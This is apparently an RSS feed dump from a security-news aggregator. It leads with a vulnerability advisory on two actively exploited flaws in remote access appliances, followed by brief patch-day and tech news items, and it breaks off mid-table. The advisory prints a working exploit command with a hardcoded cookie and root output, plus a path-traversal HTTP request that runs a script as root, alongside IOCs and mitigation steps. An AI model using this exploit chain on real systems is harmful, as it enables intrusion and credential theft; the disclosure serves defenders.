<content:encoded><![CDATA[<h2>Overview</h2><p><span>On July 14, 2026, SonicWall </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008" target="_blank"><span>published</span></a><span> a security advisory addressing two vulnerabilities affecting SMA1000 Series remote access appliances, including the critical server-side request forgery (SSRF) vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-15409" target="_blank"><span>CVE-2026-15409</span></a><span> (CVSS 10.0) and the high-severity code injection vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-15410" target="_blank"><span>CVE-2026-15410</span></a><span>. The advisory urges customers to immediately apply the latest platform hotfix releases.</span></p><p><span>Successful exploitation of CVE-2026-15409 permits an unauthenticated attacker to open a websocket-based tunnel to arbitrary localhost-only services, while CVE-2026-15410 is a local privilege escalation that permits an attacker with access to an internal service listening on port 8188 on localhost to execute arbitrary operating system commands as root via a malicious path traversal-based </span><span><span data-type="inlineCode">remove_hotfix</span></span><span> workflow.</span></p><p><span>Both vulnerabilities are being actively exploited in the wild. Prior to SonicWall’s official vulnerability disclosure, Rapid7’s Managed Detection and Response team observed active, targeted zero-day exploitation of internet-facing SMA 1000-series appliances. In the SonicWall advisory, exploitation in the wild was </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008#EITW" target="_blank"><span>noted</span></a><span>, and both </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15409" target="_blank"><span>CVE-2026-15409</span></a><span> and </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15410" target="_blank"><span>CVE-2026-15410</span></a><span> have been added to CISA's Known Exploited Vulnerabilities (</span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" target="_blank"><span>KEV</span></a><span>) catalog. Given the confirmed exploitation activity and the critical unauthenticated impact of the vulnerabilities, organizations should prioritize remediation of SMA1000 appliances on an emergency basis. A Python proof-of-concept for CVE-2026-15409 is available </span><a href="https://github.com/remmons-r7/rapid7-CVE-2026-15409"><span>here</span></a><span> for exposure validation, and a Metasploit module for the chain is in development.</span></p><p><span>Affected products include SonicWall SMA1000 Series models 6210, 7210, and 8200v running:</span></p><ul><li><p><span>12.4.3-03245</span></p></li><li><p><span>12.4.3-03387</span></p></li><li><p><span>12.4.3-03434 (platform-hotfix)</span></p></li><li><p><span>12.5.0-02283</span></p></li><li><p><span>12.5.0-02624</span></p></li><li><p><span>12.5.0-02800 (platform-hotfix)</span></p></li></ul><p><span>These vulnerabilities do not affect SSL VPN functionality on SonicWall firewalls or the SMA 100 Series product line.</span></p><h2>Technical overview</h2><p><span>The primary vulnerability is in a websocket proxy feature, accessed via the path /wsproxy on the affected “SonicWall WorkPlace” application (served on port 443 by default). This feature permits a netcat-like TCP tunnel to arbitrary hosts and ports, which are provided by the user in URL parameters. By providing host values that point to localhost, the attacker can access local SonicWall appliance system services behind the firewall to send and receive arbitrary TCP traffic to and from them. This is the first-stage vulnerability, CVE-2026-15409, that Rapid7 MDR analysts are seeing attackers exploiting in the wild. With this capability, an attacker can reach and exploit less-hardened services running on the appliance, such as the Erlang application on localhost:1050 or the ctrl-service application on localhost:8188. </span></p><p><span>We developed an exploit targeting the Erlang process listening on localhost:1050 for remote code execution. Note that the provided cookie value is hardcoded for the Erlang process, based on our testing, so authentication is not required to establish code execution.</span></p><pre language="html"># python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&amp;serviceType=SSH&amp;host=0.0.0.0&amp;port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'whoami &amp;&amp; id &amp;&amp; pwd &amp;&amp; hostname'
Authenticated to couchdb@127.0.0.1
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 =&gt; couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma</pre><p><span></span></p><p><span>With code execution established, the attacker can escalate to root on the appliance by exploiting CVE-2026-15410, which is a path traversal in the remove_hotfix workflow of ctrl-service. This can be performed via the web console or by hitting port 8188 on the device. The attacker provides a hotfix value containing a path traversal sequence to a malicious script, such as “../../../../var/tmp/privesc”. The system executes the script as root and (typically) reboots the appliance immediately after.</span><br><span>An example malicious request achieving privilege escalation by leveraging this from the web panel is depicted below:</span></p><pre language="html">POST /rollbackConfirm.action HTTP/1.1
Host: 192.168.181.46:8443
Cookie: EXTRAWEB_REFERER=%252F; JSESSIONID=node01bcg1tbiy6qi7s97xsoa42lhp8.node0
Content-Length: 134
Cache-Control: max-age=0
Sec-Ch-Ua: "Not?A_Brand";v="24", "Chromium";v="152"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/152.0.0.0 Safari/537.36
Origin: https://192.168.181.46:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.181.46:8443/rollbackConfirm.action
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

csrfToken=GFEJUCQBUZOLUCCOO3YBA8G30ZE9VKDP&amp;command=rollback&amp;rollbackUpgradeTime=&amp;hotfix=../../../../../tmp/1234.sh&amp;rollbackHotfixTime=</pre><p><span></span></p><p><span>If the provided hotfix file does not exist, a reboot does not occur. If the provided file exists, the system reboots after it chmods and executes the file. Below is a system monitor (pspy) depicting output of this occurring during exploitation:</span></p><pre language="html">2026/07/09 23:21:00 CMD: UID=0     PID=10355  | chmod +x /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh
2026/07/09 23:21:00 CMD: UID=0     PID=10355  | /bin/bash /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh --unattended
2026/07/09 23:21:00 CMD: UID=0     PID=10361  | /usr/bin/python3 /usr/local/ctrl-service/bin/ctrl-service.py
[...]
2026/07/09 23:21:22 CMD: UID=0     PID=11124  | shutdown -r now</pre><p><span></span></p><p><span>A Python proof-of-concept for CVE-2026-15409 is available </span><a href="https://github.com/remmons-r7/rapid7-CVE-2026-15409" target="_blank"><span>here</span></a><span>; a Metasploit module for the chain is in development.</span></p><h2>Mitigation guidance</h2><p><span>Organizations operating SonicWall SMA1000 appliances should </span><span><strong>immediately upgrade</strong></span><span> to the latest platform hotfix releases.</span></p><p><span>Fixed versions are:</span></p><table><colgroup data-width="609"><col><col></colgroup><thead><tr><th><p><span>Product</span></p></th><th><p><span>Fixed Version</span></p></th></tr></thead><tbody><tr><td><p><span>SMA1000 Series (6210, 7210, 8200v)</span></p></td><td><p><span>12.4.3-03453 (platform-hotfix) or later</span></p></td></tr><tr><td><p><span>SMA1000 Series (6210, 7210, 8200v)</span></p></td><td><p><span>12.5.0-02835 (platform-hotfix) or later</span></p></td></tr></tbody></table><p><span></span></p><p><span>There are </span><span><strong>no workarounds</strong></span><span> available.</span></p><p><span>Because active exploitation has been confirmed, organizations should not rely solely on patching. SonicWall additionally recommends:</span></p><ul><li><p><span>Performing a thorough forensic review for indicators of compromise.</span></p></li><li><p><span>Re-imaging physical appliances or redeploying virtual appliances if compromise is identified.</span></p></li><li><p><span>Changing user and administrator passwords.</span></p></li><li><p><span>Resetting TOTP tokens following confirmed compromise.</span></p></li></ul><p><span>Customers should consult the SonicWall security advisory for the latest remediation guidance and platform hotfix availability.</span></p><h2>Observed exploitation</h2><p><span>Prior to SonicWall’s official vulnerability disclosure, our Managed Detection and Response team observed active, targeted exploitation of internet-facing SMA 1000-series appliances. Threat actors were primarily leveraging the perimeter appliance as a stealthy initial access vector, executing commands on the operating system by bypassing traditional input validation controls. Once they established a foothold on the appliance, the actors systematically extracted high-value credentials, active session databases, and Time-Based One-Time Password (TOTP) multi-factor authentication (MFA) seed configurations. This local harvesting was designed to ensure long-term, persistent access that could survive standard network-level remediations.</span></p><p><span>With these harvested resources, the threat actors quickly shifted to lateral movement, pivoting from the compromised appliance directly into the internal corporate network. Specifically, we observed a sequence of anomalous, VPN-less Active Directory authentications targeting core domain controllers. These authentications originated directly from the appliance’s internal IP address, using atypical, non-corporate workstation client names (such as kali or other non-inventory hostnames) under the context of the appliance’s integrated LDAP service account. This unique behavior of direct, machine-level lateral movement with no corresponding active VPN tunnel confirmed that the appliance itself had been fully compromised and was acting as an unmonitored backdoor into the corporate directory infrastructure.</span></p><h2>Artifacts or evidence sources and IOCs</h2><p><span>Rapid7 recommends reviewing appliance logs for evidence of active exploitation, including the following characteristic behaviors and specific log indicators:</span></p><h3><span>Characteristic Behaviors</span></h3><ul><li><p><span><strong>Websocket exploit IOC log patterns:</strong></span><span> extraweb_access.log entries containing the strings ("GET" AND "wsproxy" AND "=-3389" AND “ 101 “) indicate interactions with the niche affected service. If suspicious host parameter values such as “0.0.0.0”, “localhost”, or “::ffff:127.0.0.1” are present, that’s indicative of likely exploitation of CVE-2026-15409. Note that “serviceType=SSH” was used in our published materials, but options such as “serviceType=TELNET” are viable alternatives.</span></p></li><li><p><span><strong>Hotfix removal exploit IOC log patterns:</strong></span><span> The ctrl-service.log shows the hotfix-removal utility (/usr/local/bin/remove_hotfix) being invoked with traversal sequences pointing to attacker-staged shell script payloads (e.g., ../../../../../../tmp/sma1000_5c47.sh). This is indicative of successful exploitation of CVE-2026-15410.</span></p></li><li><p><span><strong>Internet-facing probing:</strong></span><span> Enumeration of the SMA portal, including repeated requests to /auth1.html, path-traversal attempts, and generic file/enumeration requests (e.g., /.env, /api/sonicos/is-sslvpn-enabled).</span></p></li><li><p><span><strong>Authentication activity:</strong></span><span> Authentication-API activity against /__api__/logon/&lt;session-id&gt;/authenticate.</span></p></li><li><p><span><strong>Sensitive path access:</strong></span><span> Access to sensitive appliance paths such as /tmp/temp.db*, consistent with theft of stored session data.</span></p></li><li><p><span><strong>AD/Service Account Compromise:</strong></span><span> NTLM logons (Windows Event ID 4624, logon type 3) into internal domain controllers sourced from the appliance's internal IP address, using attacker-controlled workstation names (e.g., kali) without a corresponding VPN session.</span></p></li></ul><ul><li><p><span><strong>extraweb_access.log:</strong></span><span> Requests to /__api__/login or /__api__/logout returning HTTP 200, and requests to /wsproxy containing suspicious host parameters returning HTTP 101.</span></p></li></ul><h3><span>Configuration artifacts</span></h3><ul><li><p><span>/var/lib/unit/conf.json containing routes for /__api__/login or /__api__/logout, which are not present in legitimate configurations.</span></p></li></ul><h3><span>Atomic Indicators</span></h3><ul><li><p><span><strong>F.N.S Holdings Limited (ASN - 206092): </strong></span><span>The threat actor(s) utilized varying IP addresses, but they belonged to the VPN hosting provider FNS Holdings Limited. Limit or block access to FNS Holdings Limited if there is no business need. For reference, the IP addresses we observed were:</span></p></li><ul><li><p><span>45.131.194.0/24</span></p></li><li><p><span>45.146.54.0/24</span></p></li><li><p><span>63.135.161.0/24</span></p></li><li><p><span>173.239.211.0/24</span></p></li><li><p><span>193.37.32[.]179</span></p></li><li><p><span>193.37.32[.]214</span></p></li><li><p><span>216.73.163[.]151</span></p></li><li><p><span>216.73.163[.]158</span></p></li></ul></ul><p><span>If any indicators of compromise are identified, organizations should treat the appliance as compromised and follow SonicWall’s recovery guidance.</span></p><h2>Rapid7 customers</h2><p><span>Organizations should prioritize identifying all internet-facing SonicWall SMA1000 appliances and determine whether affected software versions remain deployed. Given SonicWall’s and Rapid7’s confirmation of active exploitation, exposed appliances should be considered high-priority assets for remediation.</span></p><p><span>Security teams should also review available authentication, web access, and appliance management logs for the indicators published by SonicWall to determine whether follow-up incident response activities are warranted.</span></p><h3>Exposure Command, InsightVM, and Nexpose</h3><p><span>Exposure Command, InsightVM, and Nexpose customers will be able to assess exposure to </span><span><strong>CVE-2026-15409</strong></span><span> and </span><span><strong>CVE-2026-15410</strong></span><span> with authenticated vulnerability checks available in the July 15 content release.</span></p><h2>Updates</h2><p><span><strong>July 15, 2026:</strong></span><span> Initial publication.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Opera Browser Gains Major iPhone User Growth In The US And UK]]></title>
<description><![CDATA[More people with iPhones are looking past Safari and picking a different option to browse the web. Opera recently shared that its mobile application saw a massive jump in monthly active users during the second quarter of 2026. The company recorded a 50 percent increase in the United States and a ...]]></description>
<link>https://tsecurity.de/de/3671312/ios-mac-os/opera-browser-gains-major-iphone-user-growth-in-the-us-and-uk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671312/ios-mac-os/opera-browser-gains-major-iphone-user-growth-in-the-us-and-uk/</guid>
<pubDate>Wed, 15 Jul 2026 18:11:48 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[More people with iPhones are looking past Safari and picking a different option to browse the web. Opera recently shared that its mobile application saw a massive jump in monthly active users during the second quarter of 2026. The company recorded a 50 percent increase in the United States and a 93 percent jump in the United Kingdom compared to the same period last year.



Looking at overall mobile growth for both iOS and Android, the browser saw active users jump by 66 percent in the UK and 40 percent in the US.



New features keep mobile users hooked on the browser platform



Much of this recent momentum comes from a software update that makes the app much easier to use. Opera introduced a new synchronization system for its iOS version. This tool allows users to instantly share their tabs, saved bookmarks, and passwords between a desktop computer and an iPhone.



The company also added quick media controls right inside the tab view. You can easily spot which page is playing audio and quickly mute or unmute the sound without clicking through multiple screens.



Artificial intelligence tools play a big role in keeping people around. The built in assistant can now handle image prompts and file uploads straight from a mobile phone. Along with these new updates, the company points out that a free virtual private network and a built in ad blocker are major reasons why people decide to keep using the app long term.



This growth builds on a wave of new users from Europe. Last year, new digital market rules forced Apple to show a browser choice screen on its devices. That change helped the alternative browser grow 42 percent across Europe. Now, that same energy is clearly spilling over into the US and UK markets.



The internet landscape is shifting, and people are proving they will stick with a third-party option if it offers the right mix of privacy and smart tools.]]></content:encoded>
</item>
<item>
<title><![CDATA[Rekord-Patchday: Microsoft behebt 570 Schwachstellen - it-daily.net]]></title>
<description><![CDATA[Microsoft hat an seinem Patchday im Juli 2026 insgesamt 570 Sicherheitslücken in Windows, Office, Exchange Server, SharePoint Server, SQL Server, ...]]></description>
<link>https://tsecurity.de/de/3671247/windows-server/rekord-patchday-microsoft-behebt-570-schwachstellen-it-dailynet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671247/windows-server/rekord-patchday-microsoft-behebt-570-schwachstellen-it-dailynet/</guid>
<pubDate>Wed, 15 Jul 2026 18:02:07 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft hat an seinem Patchday im Juli 2026 insgesamt 570 Sicherheitslücken in <b>Windows</b>, Office, Exchange <b>Server</b>, SharePoint <b>Server</b>, SQL <b>Server</b>, ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Juli-Patch-Day: Update behebt 622 Sicherheitslücken - PCMasters.de]]></title>
<description><![CDATA[Weitere Updates verteilten sich auf Microsoft Edge (46), Entwicklertools (27), SharePoint Server (17) und Azure (11). Die Gesamtzahl der behobenen ...]]></description>
<link>https://tsecurity.de/de/3671243/windows-server/microsoft-juli-patch-day-update-behebt-622-sicherheitsluecken-pcmastersde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671243/windows-server/microsoft-juli-patch-day-update-behebt-622-sicherheitsluecken-pcmastersde/</guid>
<pubDate>Wed, 15 Jul 2026 18:02:02 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Weitere Updates verteilten sich auf Microsoft Edge (46), Entwicklertools (27), SharePoint <b>Server</b> (17) und Azure (11). Die Gesamtzahl der behobenen ...]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP schließt kritische Sicherheitslücken in NetWeaver und Commerce Cloud - it-daily.net]]></title>
<description><![CDATA[Weitere Sicherheitsrisiken und historische Relevanz. Neben den drei kritischen Fehlern behebt das Update-Paket sechs Schwachstellen mit hohem ...]]></description>
<link>https://tsecurity.de/de/3671054/it-security-nachrichten/sap-schliesst-kritische-sicherheitsluecken-in-netweaver-und-commerce-cloud-it-dailynet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671054/it-security-nachrichten/sap-schliesst-kritische-sicherheitsluecken-in-netweaver-und-commerce-cloud-it-dailynet/</guid>
<pubDate>Wed, 15 Jul 2026 16:55:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Weitere Sicherheitsrisiken und historische Relevanz. Neben den drei kritischen Fehlern behebt das Update-Paket sechs Schwachstellen mit hohem ...]]></content:encoded>
</item>
<item>
<title><![CDATA[ICE “Human Safari” Doctrine to Fire at Fleeing Drivers is Intent to Cause Death]]></title>
<description><![CDATA[It seems like forever ago, in October 2012, that I wrote about a single bullet that separated defense from murder. It was in context of the “hack back” or “active defense” work I was doing at the time. The case of Private Lee Clegg, a British soldier at a Belfast checkpoint in 1990, is foundation...]]></description>
<link>https://tsecurity.de/de/3670948/it-security-nachrichten/ice-human-safari-doctrine-to-fire-at-fleeing-drivers-is-intent-to-cause-death/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670948/it-security-nachrichten/ice-human-safari-doctrine-to-fire-at-fleeing-drivers-is-intent-to-cause-death/</guid>
<pubDate>Wed, 15 Jul 2026 16:24:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It seems like forever ago, in October 2012, that I wrote about a single bullet that separated defense from murder. It was in context of the “hack back” or “active defense” work I was doing at the time. The case of Private Lee Clegg, a British soldier at a Belfast checkpoint in 1990, is foundational … <a href="https://www.flyingpenguin.com/ice-human-safari-doctrine-to-fire-at-fleeing-drivers-is-intent-to-cause-death/" class="more-link">Continue reading <span class="screen-reader-text">ICE “Human Safari” Doctrine to Fire at Fleeing Drivers is Intent to Cause Death</span> <span class="meta-nav">→</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rekord-Patchday: Microsoft behebt 570 Schwachstellen]]></title>
<description><![CDATA[Microsoft schließt beim bislang größten Patchday 570 Sicherheitslücken und erzwingt das Aus für die veraltete Kerberos-RC4-Verschlüsselung.

Tags: #Cyber Security | #Microsoft]]></description>
<link>https://tsecurity.de/de/3670210/it-security-nachrichten/rekord-patchday-microsoft-behebt-570-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670210/it-security-nachrichten/rekord-patchday-microsoft-behebt-570-schwachstellen/</guid>
<pubDate>Wed, 15 Jul 2026 11:54:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2024/01/Microsoft-Quelle-HJBC-Shutterstock-2325970865-1920.jpg" class="attachment-full size-full wp-post-image" alt="Microsoft" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2024/01/Microsoft-Quelle-HJBC-Shutterstock-2325970865-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2024/01/Microsoft-Quelle-HJBC-Shutterstock-2325970865-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2024/01/Microsoft-Quelle-HJBC-Shutterstock-2325970865-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2024/01/Microsoft-Quelle-HJBC-Shutterstock-2325970865-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2024/01/Microsoft-Quelle-HJBC-Shutterstock-2325970865-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Rekord-Patchday: Microsoft behebt 570 Schwachstellen 1"></p>
    Microsoft schließt beim bislang größten Patchday 570 Sicherheitslücken und erzwingt das Aus für die veraltete Kerberos-RC4-Verschlüsselung.

<p>Tags: <a href="https://www.it-daily.net/thema/cyber-security">#Cyber Security</a> | <a href="https://www.it-daily.net/thema/microsoft">#Microsoft</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft beseitigt irren 500-GB-Fehler in Windows 11]]></title>
<description><![CDATA[Zum Juli-Patchday hat Microsoft nicht nur eine Rekordzahl von Sicherheitslücken geschlossen und viele neue Funktionen ausgeliefert, sondern auch einen kuriosen Fehler beseitigt, der dazu führte, dass Windows 11 bis zu 500 GB Speicherplatz unnötig belegte.



Dieser Capability Access Manager-Bug k...]]></description>
<link>https://tsecurity.de/de/3670149/it-nachrichten/microsoft-beseitigt-irren-500-gb-fehler-in-windows-11/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670149/it-nachrichten/microsoft-beseitigt-irren-500-gb-fehler-in-windows-11/</guid>
<pubDate>Wed, 15 Jul 2026 11:17:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Zum Juli-Patchday hat Microsoft nicht nur eine<a href="https://www.pcwelt.de/article/3191057/microsofts-monster-patchday-sprengt-alle-rekorde.html" target="_blank" rel="noreferrer noopener"> Rekordzahl von Sicherheitslücken geschlossen</a> und <a href="https://www.pcwelt.de/article/3191132/windows-bekommt-jetzt-viele-neue-funktionen-der-grose-uberblick.html" target="_blank" rel="noreferrer noopener">viele neue Funktionen ausgeliefert, </a>sondern auch einen kuriosen Fehler beseitigt, der dazu führte, dass Windows 11 bis zu 500 GB Speicherplatz unnötig belegte.</p>



<p>Dieser <a href="https://www.pcwelt.de/article/3184764/windows-11-bug-schluckt-bis-zu-500-gb-speicherplatz-auf-dem-system.html" target="_blank" rel="noreferrer noopener">Capability Access Manager-Bug</a> kann dazu führen, dass auf Windows-11-Rechnern der Speicherplatz knapp wird, obwohl eigentlich ausreichend freier Speicherplatz vorhanden ist. Ein Fehler in der Datei <em>CapabilityAccessManager.db-wal</em> führt dazu, dass das Systemlaufwerk immer voller wird. Diese Datei ist mit dem Windows-Dienst „Capability Access Manager“ verknüpft, der wiederum für App-Berechtigungen unter Windows zuständig ist. Eigentlich sollte die dazugehörige Datei nur wenige Megabyte an Speicherplatz beanspruchen, doch bei einigen PCs sind es eben mehrere hundert Gigabyte.</p>



<p>Genau dieses Problem geht Microsoft im Rahmen des Juli-2026-Patchdays ebenfalls mit dem Patch <a href="https://support.microsoft.com/en-us/servicing/os/windows-11/2026/07/july-14-2026-kb5101650-os-builds-26200-8875-and-26100-8875">KB5101650 </a>an, wie Windowslatest <a href="https://www.windowslatest.com/2026/07/15/microsoft-just-fixed-a-bug-using-massive-windows-11-storage-verify-if-its-applied-to-your-pc/">berichtet</a>. Windows 11 KB5101650 behebt besagten Fehler im Capability Access Manager. Anders als die oben erwähnten neuen Funktionen, sollte dieser Fix nach der Installation sofort funktionieren und nicht erst später scharfgeschaltet werden. </p>



<p>Der entsprechende Eintrag von Microsoft zu diesem Problem im Changelog fällt denkbar lakonisch aus: “[Speicher] Dieses Update verbessert die Speicherplatznutzung für die Datei „CapabilityAccessManager.db-wal”. Microsoft sagt aber nicht, ob eine WAL-Datei, die bereits auf mehrere Hundert Gigabyte angewachsen ist, automatisch verkleinert wird. Von Nutzern, die das Update im Rahmen der Juni-Vorschau bereits installiert hatten, wurde laut Windowslatest berichtet, dass ihre Datei unmittelbar nach dem Update immer noch groß war und erst wieder normal wurde, nachdem sie sie manuell gelöscht hatten.</p>



<p>Es ist also wichtig, dass Sie nach der Installation der Patchday-Updates nachschauen, ob die WAL-Datei noch riesengroß ist oder auf ihre korrekte Größe geschrumpft ist. Hierfür geben Sie in der Windows-Eingabeaufforderung mit Administratorrechten Folgendes ein:</p>



<p>robocopy “C:\ProgramData\Microsoft\Windows\CapabilityAccessManager”</p>



<p>“%TEMP%\CAMCheck” /L /B /R:0 /W:0 /BYTES /NP</p>



<p>Alternativ nutzen Sie ein externes Tool wie <em><a href="https://www.pcwelt.de/article/1191418/wiztree.html" target="_blank" rel="noreferrer noopener">WizTree</a>, <a href="https://www.pcwelt.de/article/1143810/treesize-free.html" target="_blank" rel="noreferrer noopener">TreeSize</a> </em>oder <em><a href="https://www.pcwelt.de/article/1143264/windirstat-2.html" target="_blank" rel="noreferrer noopener">WinDirStat</a></em> und suchen damit nach der Datei <em>CapabilityAccessManager.db-wal</em> und überprüfen, wie groß diese Datei ist. Ist sie mehrere GB groß, scheint das eben dieser Bug zu sein und Sie sollten die Datei CapabilityAccessManager.db-wal löschen, und <a href="https://learn.microsoft.com/en-us/answers/questions/5815087/capabilityaccessmanager-is-devouring-my-hard-drive">zwar nach dem hier beschriebenen Weg</a>. Ist die Datei nur wenige Hundert Kilobyte oder maximal um die 1,6 MB groß, dann ist alles in Ordnung.</p>



<p>Das Löschen der Datei auf eine Art und Weise, <a href="https://learn.microsoft.com/en-us/answers/questions/5815087/capabilityaccessmanager-is-devouring-my-hard-drive">die nicht der Empfehlung entspricht,</a> kann allerdings Probleme verursachen, wie Windowslatest <a href="https://www.windowslatest.com/2026/07/15/microsoft-just-fixed-a-bug-using-massive-windows-11-storage-verify-if-its-applied-to-your-pc/">berichtet</a>.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsofts Monster-Patchday sprengt alle Rekorde]]></title>
<description><![CDATA[Bei seinem Patchday am 14. Juli hat Microsoft Sicherheits-Updates gegen 570 neue Sicherheitslücken bereitgestellt. Rechnet man die Patches zusammen, die Microsoft seit Anfang des Monats bereitgestellt hat, werden es sogar mehr als 620. Dies als neuen Rekordwert zu bezeichnen, wäre eine maßlose Un...]]></description>
<link>https://tsecurity.de/de/3669891/it-nachrichten/microsofts-monster-patchday-sprengt-alle-rekorde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669891/it-nachrichten/microsofts-monster-patchday-sprengt-alle-rekorde/</guid>
<pubDate>Wed, 15 Jul 2026 09:31:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Bei seinem Patchday am 14. Juli hat Microsoft Sicherheits-Updates gegen 570 neue Sicherheitslücken bereitgestellt. Rechnet man die Patches zusammen, die Microsoft seit Anfang des Monats bereitgestellt hat, werden es sogar mehr als 620. Dies als neuen Rekordwert zu bezeichnen, wäre eine maßlose Untertreibung – der bisherige Rekord lag bei 206 im Juni 2026, ist also nur fünf Wochen alt. Die Gesamtzahl der bislang in diesem Jahr gestopften Lücken (1380) übertrifft damit bereits jetzt die des Rekordjahrs 2020 (1250).</p>



<p>Neben Windows und Office sind auch Exchange Server, Hyper-V, Visual Studio, Github Copilot und Microsofts Cloud-Dienste betroffen, ebenso Ages of Empire II und Minecraft Server – im Grunde das gesamte Microsoft-Portfolio. Zwei Lücken werden bereits für Angriffe ausgenutzt. Ganze 58 der 570 Schwachstellen stuft Microsoft als kritisch ein, die übrigen sind fast alle als hohes Risiko ausgewiesen.</p>



<p>Die Details zu den Schwachstellen bietet Microsoft zum Selbstsuchen im <a href="https://msrc.microsoft.com/update-guide/" target="_blank" rel="noreferrer noopener">Leitfaden für Sicherheitsupdates</a>. Deutlich übersichtlicher bereitet Dustin Childs im <a href="https://www.zerodayinitiative.com/blog/" target="_blank" rel="noreferrer noopener">Blog von Trend Micro ZDI</a> das Thema Update-Dienstag auf – stets auch mit Blick auf Admins, die Unternehmensnetzwerke betreuen.</p>



<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained">
<p><strong>Die wichtigsten Sicherheitslücken beim Patch Day im Juli:</strong></p>



<figure class="wp-block-table is-style-stripes"><table class="has-fixed-layout"><thead><tr><th>CVE</th><th>anfällige Software</th><th>Schwere­grad</th><th>Aus­wirkung</th><th>aus­genutzt</th><th>vorab bekannt</th><th>CVSS</th></tr></thead><tbody><tr><td>CVE-2026- 56155</td><td>Windows, Active Directory</td><td>hoch</td><td>EoP</td><td><mark class="has-inline-color has-vivid-red-color"><strong>ja</strong></mark></td><td>nein</td><td>7.8</td></tr><tr><td>CVE-2026-56164</td><td>SharePoint Server</td><td>mittel</td><td>EoP</td><td><strong><mark class="has-inline-color has-vivid-red-color">ja</mark></strong></td><td>nein</td><td>5.3</td></tr><tr><td>CVE-2026-57092</td><td>Windows, VMSwitch</td><td>kritisch</td><td>EoP</td><td>nein</td><td>nein</td><td>9.9</td></tr><tr><td>CVE-2026-50522</td><td>SharePoint</td><td>kritisch</td><td>RCE</td><td>nein</td><td>nein</td><td>9.8</td></tr><tr><td>CVE-2026-58644</td><td>SharePoint</td><td>kritisch</td><td>RCE</td><td>nein</td><td>nein</td><td>9.8</td></tr><tr><td>CVE-2026-56188</td><td>Windows Server, 